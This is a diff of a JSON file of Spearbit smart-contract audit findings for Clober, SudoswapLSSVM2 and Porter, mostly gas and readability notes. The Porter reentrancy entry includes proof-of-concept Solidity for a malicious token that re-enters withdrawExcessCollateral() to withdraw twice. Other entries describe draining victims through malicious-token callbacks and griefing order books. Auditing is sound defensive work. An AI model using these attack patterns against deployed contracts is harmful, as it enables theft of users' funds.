parameters for sanity and optimization", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Functions expecting NFT deposits in their typical flows can validate parameters for sanity and optimization.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Redundant zero minusFee setter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "minusFee defaults to zero, so the explicit setting of it is redundant.", + "title": "Functions expecting ETH deposits can check msg.value for sanity and optimization", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Functions that expect ETH deposits in their typical flows can check for non-zero values of msg.value for sanity and optimization.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Load _FEE_PRECISION into local variable before usage", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Loading _FEE_PRECISION into a local variable slightly reduced bytecode size (0.017kB) and was found to be a tad more gas efficient.", + "title": "LSSVMPairs can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "At the different LSSVMPairs, PairVariant and IMMUTABLE_PARAMS_LENGTH can be passed to LSSVMPair, which could store them as immutable.
Then functions pairVariant() and _immutableParamsLength() can also be moved to LSSVMPair, which would simplify the code.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Can cache value difference in SegmentedSegmentTree464.update", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The replaced - value expression in SegmentedSegmentTree464.pop is recomputed several times in each loop iteration.", + "title": "Unused values in catch can be avoided for better readability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Employing a catch clause with higher verbosity may reduce readability. Solidity supports different kinds of catch blocks depending on the type of error. However, if the error data is of no interest, one can use a simple catch statement without error data.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Unnecessary loop condition in pop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The loop variable l in SegmentedSegmentTree464.pop is an unsigned int, so the loop condition l >= 0 is always true. The reason why it still terminates is that the first layer only has group index 0 and 1, so the rightIndex.group - leftIndex.group < 4 condition is always true when the first layer is reached, and then it terminates with the break keyword.", + "title": "Stale constant and comments reduce readability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "After some updates, the logic was added ~2 years ago when the enum was changed to int16. Based on the comments, and given that it was upgradeable, it was expected that one could add new unconfigured specs with negative IDs between NONE (by decrementing it) and NOT_CONFIGURED. In this non-upgradeable fork, the current constants treat only the spec ID of 0 as NOT_CONFIGURED. // Anything > NONE and <= NOT_CONFIGURED is considered not configured int16 private constant NONE = -1; int16 private constant NOT_CONFIGURED = 0;", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Use same comparisons for children in heap", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The pop function compares one child with a strict inequality (<) and the other with less than or equals (<=). A heap doesn't guarantee order between the children and there are no duplicate nodes (wordIndexes).", + "title": "Different MAX_FEE value and comments in different places is misleading", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The same MAX_FEE constant is declared in different files with different values, while comments indicate that these values should be the same. // 50%, must <= 1 - MAX_PROTOCOL_FEE (set in LSSVMPairFactory) uint256 internal constant MAX_FEE = 0.5e18; uint256 internal constant MAX_PROTOCOL_FEE = 0.1e18; // 10%, must <= 1 - MAX_FEE",
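For illustration, one way to keep the two caps from drifting apart is a single shared definition; the library name is hypothetical:

library FeeLimits {
    uint256 internal constant MAX_FEE = 0.5e18;          // 50%
    uint256 internal constant MAX_PROTOCOL_FEE = 0.1e18; // 10%; MAX_FEE + MAX_PROTOCOL_FEE <= 1e18
}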
// 50%, must <= 1 - MAX_PROTOCOL_FEE (set in LSSVMPairFactory) uint256 internal constant MAX_FEE = 0.5e18; uint256 internal constant MAX_PROTOCOL_FEE = 0.1e18; // 10%, must <= 1 - MAX_FEE", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "No need for explicit assignment with default values", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Explicitly assigning ZERO value (or any default value) costs gas, but is not needed.", + "title": "Events without indexed event parameters make it harder/inefficient for off-chain tools", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Indexed event fields make events quickly accessible to off-chain tools that parse events. However, note that each indexed field costs extra gas during emission; so it's not necessarily best to index the maximum allowed per event (three fields).", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Prefix increment is more efficient than postfix increment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The prefix increment reduces bytecode size by a little, and is slightly more gas efficient.", + "title": "Some functions included in LSSVMPair are not found in ILSSVMPair.sol and ILSSVMPairFactoryLike.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The LSSVMPair contract defines the following functions which are missing from interface ILSSVMPair: ROYALTY_ENGINE() spotPrice() delta() assetRecipient() pairVariant() factory() swapNFTsForToken() (2 versions) swapTokenForSpecificNFTs() getSellNFTQuoteWithRoyalties() call() withdrawERC1155()", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Tree update can be avoided for fully filled orders", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "For fully filled orders, remainingAmount will be 0 (openOrderAmount == claimedRawAmount), so the tree update can be skipped since the new value is the same as the old value. Hence, the code block can be moved inside the if (remainingAmount > 0) code block.", + "title": "Absent/Incomplete Natspec affects readability and maintenance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Comments are key to understanding the codebase logic. In particular, Natspec comments provide rich documentation for functions, return variables and more. This documentation aids users, developers and auditors in understanding what the functions within the contract are meant to do.
However, some functions within the codebase have either no Natspec or incomplete Natspec annotations, leading to partial descriptions of the functions.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Shift msg.value cap check for earlier revert", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The cap check on msg.value should be shifted up to the top of the function so that failed checks will revert earlier, saving gas in these cases.", + "title": "MAX_SETTABLE_FEE value does not follow a standard notation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The protocol establishes several constant hard-coded MAX_FEE-like variables across different contracts. The percentages expressed in those variables should be declared in a standard way all over the codebase. In StandardSettings.sol#L22, the standard followed by the rest of the codebase is not respected. Not respecting the standard notation may confuse the reader.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Solmate's ReentrancyGuard is more efficient than OpenZeppelin's", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Solmate's ReentrancyGuard provides the same functionality as OpenZeppelin's version, but is more efficient as it reduces the bytecode size by 0.11kB, which can be further reduced if its require statement is modified to revert with a custom error.", + "title": "No modifier for __Ownable_init", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Usually __Ownable_init also has a modifier like initializer or onlyInitializing, see OwnableUpgradeable.sol#L29. The version in OwnableWithTransferCallback.sol doesn't have this. It is not strictly necessary, as the function is internal, but it is more robust if it does. function __Ownable_init(address initialOwner) internal { _owner = initialOwner; }", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] },
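A sketch of the hardening suggested in the "No modifier for __Ownable_init" entry above, assuming the contract also mixes in OpenZeppelin's Initializable so that onlyInitializing is available; only the modifier is new relative to the quoted version:

function __Ownable_init(address initialOwner) internal onlyInitializing {
    // onlyInitializing restricts this helper to the initialization phase,
    // guarding against a stray later call resetting the owner.
    _owner = initialOwner;
}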
{ - "title": "r * r is more gas efficient than r ** 2", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "It's more gas efficient to do r * r instead of r ** 2, saving on deployment cost.", + "title": "Wrong value of seconds in year slightly affects precision", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Calculation of ONE_YEAR_SECS takes leap years into account (typically 365.25 days), aiming for the most exact precision. However, as can be seen at NASA and Stack Overflow, the value is slightly different. Current case: 365.2425 days = 31_556_952 / (24 * 3600) NASA case: 365.2422 days = 31_556_926 / (24 * 3600)", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Update childHeapIndex and shifter initial values to constants", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The initial values of childHeapIndex and shifter can be better hardcoded to avoid redundant operations.", + "title": "Missing idempotent checks may be added for consistency", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Setter functions could check if the value being set is the same as the variable's existing value, to avoid a state variable write in such scenarios; they could also revert, to flag potentially mismatched offchain-onchain states. While this is done in many places, there are a few setters missing this check.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Same value tree update falls under else case which will do redundant overflow check", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "In the case where value and replaced are equal, it currently will fall under the else case, which has an addition overflow check that isn't required in this scenario. In fact, the tree does not need to be updated at all.", + "title": "Missing events affect transparency and monitoring", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Missing events in critical functions, especially privileged ones, reduce transparency and ease of monitoring. Users may be surprised by changes effected by such functions without being able to observe related events.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] },
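One way to address the missing-events pattern described in the entry above, sketched on a hypothetical privileged setter (the event, variable, and modifier names are illustrative, not from the audited code):

event FeeRecipientUpdated(address indexed oldRecipient, address indexed newRecipient);

function setFeeRecipient(address newRecipient) external onlyOwner {
    // Emit before overwriting so the old value is still available to log.
    emit FeeRecipientUpdated(feeRecipient, newRecipient);
    feeRecipient = newRecipient;
}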
{ - "title": "Unchecked code blocks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The mentioned code blocks can be performed without native math overflow / underflow checks because they have been checked to be so, or the min / max range ensures it.", + "title": "Wrong error returned affects debugging and off-chain monitoring", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Error.INVALID_NUMITEMS is declared for the 0 case, but is returned twice in the same function: the first time for numItems == 0 and the second time for numItems >= nftBalance. This can make it hard to know why the call is failing.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Unused Custom Error", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "error TreeQueryIndexOrder(); is defined but unused.", + "title": "Functions can be renamed for clarity and consistency", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Since both functions cloneETHPair() and cloneERC20Pair() use IERC721 nft as a parameter, renaming them to cloneERC721ETHPair() and cloneERC721ERC20Pair() respectively makes it clearer that the functions process ERC721 tokens. This also provides consistency in the naming of functions, considering that we already have function cloneERC1155ETHPair() using this nomenclature.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Markets with malicious tokens should not be interacted with", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The Clober protocol is permissionless and allows anyone to create an orderbook for any base token. These base tokens can be malicious, and interacting with these markets can lead to loss of funds in several ways. For example, a token with custom code / a callback to an arbitrary address on transfer can use the pending ETH that the victim supplied to the router and trade it for another coin. The victim will lose their ETH and then be charged a second time using their WETH approval of the router.", + "title": "Two events TokenDeposit() with different parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The event TokenDeposit() of LSSVMPairFactory has an address parameter, while the event TokenDeposit() of LSSVMPair has a uint256 parameter. This might be confusing. contract LSSVMPairFactory { ... event TokenDeposit(address poolAddress); ... } abstract contract LSSVMPair ... { ... event TokenDeposit(uint256 amount); ... }", "labels": [ "Spearbit", - "Clober", + "SudoswapLSSVM2", "Severity: Informational" ] },
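A sketch of one possible disambiguation for the colliding TokenDeposit() events above; the new event names are suggestions, not names taken from the codebase:

contract LSSVMPairFactory {
    // Emitted when tokens are deposited into a pair via the factory.
    event FactoryTokenDeposit(address poolAddress);
}

abstract contract LSSVMPair {
    // Emitted when tokens are deposited directly into the pair.
    event PairTokenDeposit(uint256 amount);
}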
{ - "title": "Claim bounty of stale orders should be given to user instead of daoTreasury", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "When an unclaimed stale order is being replaced, the claimBounty is sent to the DAO treasury. However, since the user is the one executing the claim on behalf of the stale order owner, and is paying the gas for it, the claimBounty should be sent to them instead.", + "title": "Unused imports affect readability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The following imports are unused in XykCurve.sol: import {IERC721} from \"@openzeppelin/contracts/token/ERC721/IERC721.sol\"; import {LSSVMPair} from \"../LSSVMPair.sol\"; import {LSSVMPairERC20} from \"../LSSVMPairERC20.sol\"; import {LSSVMPairCloner} from \"../lib/LSSVMPairCloner.sol\"; import {ILSSVMPairFactoryLike} from \"../LSSVMPairFactory.sol\"; In LSSVMPairERC20.sol: import {IERC721} from \"@openzeppelin/contracts/token/ERC721/IERC721.sol\"; import {ICurve} from \"./bonding-curves/ICurve.sol\"; import {CurveErrorCodes} from \"./bonding-curves/CurveErrorCodes.sol\"; In LSSVMPairETH.sol: import {IERC721} from \"@openzeppelin/contracts/token/ERC721/IERC721.sol\"; import {ICurve} from \"./bonding-curves/ICurve.sol\";", "labels": [ "Spearbit", - "Clober", + "SudoswapLSSVM2", "Severity: Informational" ] }, { - "title": "Misleading comment on remainingRequestedRawAmount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The comment says // always ceil, but remainingRequestedRawAmount is rounded down when the base / quote amounts are converted to the raw amount.", + "title": "Use of isPair() is not intuitive", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "There are two use cases for isPair(): 1) To check if the contract is a pair of any of the 4 types. Here the type is always retrieved via pairVariant(). 2) To check if a pair is ETH / ERC20 / ERC721 / ERC1155. Each of these values is represented by two different pair types. Using isPair() this way is not intuitive, and some errors have been made in the code where only one value is tested. Note: also see issue \"pairTransferERC20From only supports ERC721 NFTs\". Function isPair() could be refactored to make the code easier to read and maintain. function isPair(address potentialPair, PairVariant variant) public view override returns (bool) { ... } These are the occurrences of use case 1: LSSVMPairFactory.sol: require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), \"Invalid pair address\"); LSSVMPairFactory.sol: require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), \"Invalid pair address\"); LSSVMPairFactory.sol: if (isPair(recipient, LSSVMPair(recipient).pairVariant())) { LSSVMPairERC20.sol: router.pairTransferERC20From(..., pairVariant()); LSSVMPairERC20.sol: router.pairTransferERC20From(..., pairVariant()); LSSVMPairERC20.sol: router.pairTransferERC20From(..., pairVariant()); erc721/LSSVMPairERC721.sol: router.pairTransferNFTFrom(..., pairVariant()); erc721/LSSVMPairERC721.sol: router.pairTransferNFTFrom(..., pairVariant()); erc1155/LSSVMPairERC1155.sol: router.pairTransferERC1155From(..., pairVariant()); And in the router and VeryFastRouter, which first query pairVariant(): function pairTransferERC20From(..., ILSSVMPairFactoryLike.PairVariant variant) ... { ... require(factory.isPair(msg.sender, variant), \"Not pair\"); ... } function pairTransferNFTFrom(..., ILSSVMPairFactoryLike.PairVariant variant) ... { ... require(factory.isPair(msg.sender, variant), \"Not pair\"); ... }
function pairTransferERC1155From(..., ILSSVMPairFactoryLike.PairVariant variant) ... { ... require(factory.isPair(msg.sender, variant), \"Not pair\"); ... } These are the occurrences of use case 2: LSSVMPairFactory.sol: (isPair(...ERC721_ERC20) || isPair(...ERC1155_ERC20)) StandardSettings.sol: isPair(...ERC721_ETH) || isPair(...ERC1155_ETH) StandardSettings.sol: isPair(...ERC721_ERC20) || isPair(...ERC1155_ERC20) StandardSettings.sol: isPair(...ERC721_ETH) || isPair(...ERC1155_ETH) StandardSettings.sol: isPair(...ERC721_ERC20) || isPair(...ERC1155_ERC20)", "labels": [ "Spearbit", - "Clober", + "SudoswapLSSVM2", "Severity: Informational" ] }, { - "title": "Potential DoS if quoteUnit and index to price functions are set to unreasonable values", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "There are some griefing and DoS (denial-of-service) attacks for some markets that are created with bad quoteUnit and pricing functions. 1. A market order uses _take to iterate over several price indices until the order is filled. An attacker can add a tiny amount of depth to many indices (prices), increasing the gas cost and in the worst case leading to out-of-gas transactions. 2. There can only be MAX_ORDER_SIZE (32768) different orders at a single price (index). Old orders are only replaced if the previous order at the index has been fully filled. A griefer or a market maker trying to block their competition can fill the entire order queue for a price. This requires 32768 * quoteUnit quote tokens.", + "title": "Royalty related code spread across different contracts affects readability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The contract LSSVMPairFactory contains the function authAllowedForToken(), which has a lot of interactions with external contracts related to royalties. The code is rather similar to code that is present in the RoyaltyEngine contract. Combining this code in the RoyaltyEngine contract would make the code cleaner and easier to read.", "labels": [ "Spearbit", - "Clober", + "SudoswapLSSVM2", "Severity: Informational" ] }, { - "title": "Rounding rationale could be better clarified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The rationale for rounding up / down would be easier to follow if tied to the expendInput option instead.", + "title": "Freeze Redeems if bonds too Large", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "Issuing too many bonds can result in users being unable to redeem. This is caused by arithmetic overflow in previewRedeemAtMaturity.
If a user's bonds and paidAmounts (or bonds * nonPaidAmount) product is greater than 2**256, it will overflow, reverting all attempts to redeem bonds.", "labels": [ "Spearbit", - "Clober", - "Severity: Informational" + "Porter", + "Severity: Medium Risk" ] }, { - "title": "Rename flashLoan() for better composability & ease of integration", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "For ease of 3rd party integration, consider renaming to flash(), as it would then have the same function sig as Uniswap V3, although the callback function would still be different.", + "title": "Reentrancy in withdrawExcessCollateral() and withdrawExcessPayment() functions.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "withdrawExcessCollateral() and withdrawExcessPayment() enable the caller to withdraw excess collateral and payment tokens respectively. Both functions are guarded by an onlyOwner modifier, limiting their access to the owner of the contract. function withdrawExcessCollateral(uint256 amount, address receiver) external onlyOwner function withdrawExcessPayment(address receiver) external onlyOwner When transferring tokens, execution flow is handed over to the token contract. Therefore, if a malicious token manages to call the owner's address, it can also call these functions again to withdraw more tokens than required. As an example, consider the following case where the collateral token's transferFrom() function calls the owner's address: function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { if (reenter) { reenter = false; owner.attack(bond, amount); } address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } and the owner contract has a function: function attack(address _bond, uint256 _amount) external { IBond(_bond).withdrawExcessCollateral(_amount, address(this)); } When withdrawExcessCollateral() is called by the owner, it allows it to withdraw double the amount via reentrancy.", "labels": [ "Spearbit", - "Clober", - "Severity: Informational" + "Porter", + "Severity: Medium Risk" ] },
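A sketch of a checks-effects-interactions hardening for the withdrawal functions above, assuming OpenZeppelin's ReentrancyGuardUpgradeable and SafeERC20 are mixed into Bond; the signature follows the quoted one, and the internal accounting is elided:

function withdrawExcessCollateral(uint256 amount, address receiver)
    external
    onlyOwner
    nonReentrant // blocks re-entry even if the token calls back into the owner
{
    // Effects: update any internal accounting before the external call.
    // ...
    // Interaction: the token transfer happens last.
    IERC20(collateralToken).safeTransfer(receiver, amount);
}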
{ - "title": "Unsupported tokens: tokens with more than 18 decimals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The orderbook currently does not support tokens with more than 18 decimals. However, having more than 18 decimals is very unusual.", + "title": "burn() and burnFrom() allow users to lose their bonds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "The Bond contract inherits from ERC20BurnableUpgradeable. contract Bond is IBond, OwnableUpgradeable, ERC20BurnableUpgradeable, This exposes the burn() and burnFrom() functions to users, who could get their bonds burned due to an error or a front-end attack.", "labels": [ "Spearbit", - "Clober", - "Severity: Informational" + "Porter", + "Severity: Low Risk" ] }, { - "title": "ArithmeticPriceBook and GeometricPriceBook contracts should be abstract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The ArithmeticPriceBook and GeometricPriceBook contracts don't have any external functions.", + "title": "Missing two-step transfer ownership pattern", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "After a bond is created, its ownership is transferred to the wallet which invoked the createBond function, but it can later be transferred to anyone at any time, or the renounceOwnership function can be called. The Bond contract uses the Ownable OpenZeppelin contract, which is a simple mechanism to transfer ownership without supporting a two-step ownership transfer pattern. OpenZeppelin describes Ownable as: Ownable is a simpler mechanism with a single owner \"role\" that can be assigned to a single account. This simpler mechanism can be useful for quick tests but projects with production concerns are likely to outgrow it. Ownership transfer is a critical operation, and transferring it to an inaccessible wallet or renouncing ownership by mistake can effectively lock the collateral in the contract forever.", "labels": [ "Spearbit", - "Clober", - "Severity: Informational" + "Porter", + "Severity: Low Risk" ] },
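A minimal sketch of the two-step pattern described above (OpenZeppelin's Ownable2Step is an audited, drop-in equivalent); pendingOwner and the internal _transferOwnership helper follow OpenZeppelin's Ownable conventions:

address public pendingOwner;

function transferOwnership(address newOwner) public virtual onlyOwner {
    // Step 1: nominate only; ownership does not move until the nominee accepts.
    pendingOwner = newOwner;
}

function acceptOwnership() external {
    // Step 2: only the nominee can complete the transfer, so ownership can
    // never land on a mistyped or inaccessible address.
    require(msg.sender == pendingOwner, "Not pending owner");
    pendingOwner = address(0);
    _transferOwnership(msg.sender);
}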
{ - "title": "childRawIndex in OctopusHeap.pop is not a raw index", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The OctopusHeap uses raw and heap indices. Raw indices are 0-based (root has raw index 0) and iterate the tree top to bottom, left to right. Heap indices are 1-based (root has heap index 1) and iterate the heap left to right, top to bottom, but then iterate the remaining nodes octopus arm by arm. A mapping between the raw index and heap index can be obtained through _convertRawIndexToHeapIndex. The pop function defines a childRawIndex, but this variable is not a raw index; it's actually raw index + 1 (1-based).", + "title": "Inefficient initialization of minimal proxy implementation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "The Bond contract uses a minimal proxy pattern when deployed by BondFactory. The proxy pattern requires a special initialize method to be called to set the state of each cloned contract. Nevertheless, the implementation contract can be left uninitialized, giving an attacker the opportunity to invoke the initialization. constructor() { tokenImplementation = address(new Bond()); _grantRole(DEFAULT_ADMIN_ROLE, _msgSender()); } After the issue was reported, it was discovered that a separate (not merged) development branch implements a deployment script which initializes the Bond implementation contract after the main deployment of BondFactory, leaving a narrow window for the attacker to leverage this issue and reducing impact significantly. deploy_bond_factory.ts#L24 const implementationContract = (await ethers.getContractAt( \"Bond\", await factory.tokenImplementation() )) as Bond; try { await waitUntilMined( await implementationContract.initialize( \"Placeholder Bond\", \"BOND\", deployer, THREE_YEARS_FROM_NOW_IN_SECONDS, \"0x0000000000000000000000000000000000000000\", \"0x0000000000000000000000000000000000000001\", ethers.BigNumber.from(0), ethers.BigNumber.from(0), 0 ) ); } catch (e) { console.log(\"Is the contract already initialized?\"); console.log(e); } Due to the fact that the initially reviewed code did not have the proper initialization for the Bond implementation (as it was an unmerged branch), and because in case of a successful exploitation the impact on the system remains minimal, this finding is marked as low risk. It is not necessary to create a separate transaction and initialize the storage of the implementation contract to prevent unauthorized initialization.", "labels": [ "Spearbit", - "Clober", - "Severity: Informational" + "Porter", + "Severity: Low Risk" ] }, { - "title": "Lack of orderIndex validation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The orderIndex parameter in the OrderNFT contract is missing proper validation. Realistically, the value should never exceed type(uint232).max as it is passed from the OrderBook contract; however, future changes to the code might potentially cause encoding/decoding ambiguity.", + "title": "Verify amount is greater than 0 to avoid unnecessary safeTransfer() calls", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "Balance should be checked to avoid unnecessary safeTransfer() calls with an amount of 0.", "labels": [ "Spearbit", - "Clober", - "Severity: Informational" + "Porter", + "Severity: Gas Optimization" ] },
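The zero-amount guard suggested above, sketched with hypothetical token and receiver names:

// Skip the external call entirely when there is nothing to transfer.
if (amount > 0) {
    paymentToken.safeTransfer(receiver, amount);
}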
{ - "title": "Unsafe _getParentHeapIndex, _getLeftChildHeapIndex", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "When heapIndex = 1, _getParentHeapIndex(uint16 heapIndex) would return 0, which is an invalid heap index. When heapIndex = 45, _getLeftChildHeapIndex(uint16 heapIndex) would return 62, which is an invalid heap index.", + "title": "Improve checks for token allow-list", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "The BondFactory contract has two allow-lists enabled by default, which require the team's approval for issuers and tokens to create bonds. However, the screening process was not properly defined before the assessment. In case a malicious token and issuer slip through the screening process, the protocol can be used by malicious actors to perform mass scam attacks. In such a scenario, tokens and issuers would be able to create bonds, sell those anywhere and later on exploit those tokens, leading to loss of user funds. /// @inheritdoc IBondFactory function createBond( string memory name, string memory symbol, uint256 maturity, address paymentToken, address collateralToken, uint256 collateralTokenAmount, uint256 convertibleTokenAmount, uint256 bonds ) external onlyIssuer returns (address clone)", "labels": [ "Spearbit", - "Clober", + "Porter", "Severity: Informational" ] }, { - "title": "_priceToIndex function implemented but unused", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The _priceToIndex function for the price books is implemented but unused.", + "title": "Incorrect revert message", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "error BondBeforeGracePeriodOrPaid() is used to revert when !isAfterGracePeriod() && amountUnpaid() > 0, which means the bond is before the grace period and not paid for. Therefore, the error description is incorrect. if (isAfterGracePeriod() || amountUnpaid() == 0) { _; } else { revert BondBeforeGracePeriodOrPaid(); }", "labels": [ "Spearbit", - "Clober", + "Porter", "Severity: Informational" ] }, { - "title": "Incorrect _MAX_NODES and _MAX_NODES_P descriptions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The derivation of the values _MAX_NODES and _MAX_NODES_P in the comments is incorrect. For _MAX_NODES, C * ((S * C) ** (L - 1)) = 4 * ((2 * 4) ** 3) = 2048 is missing 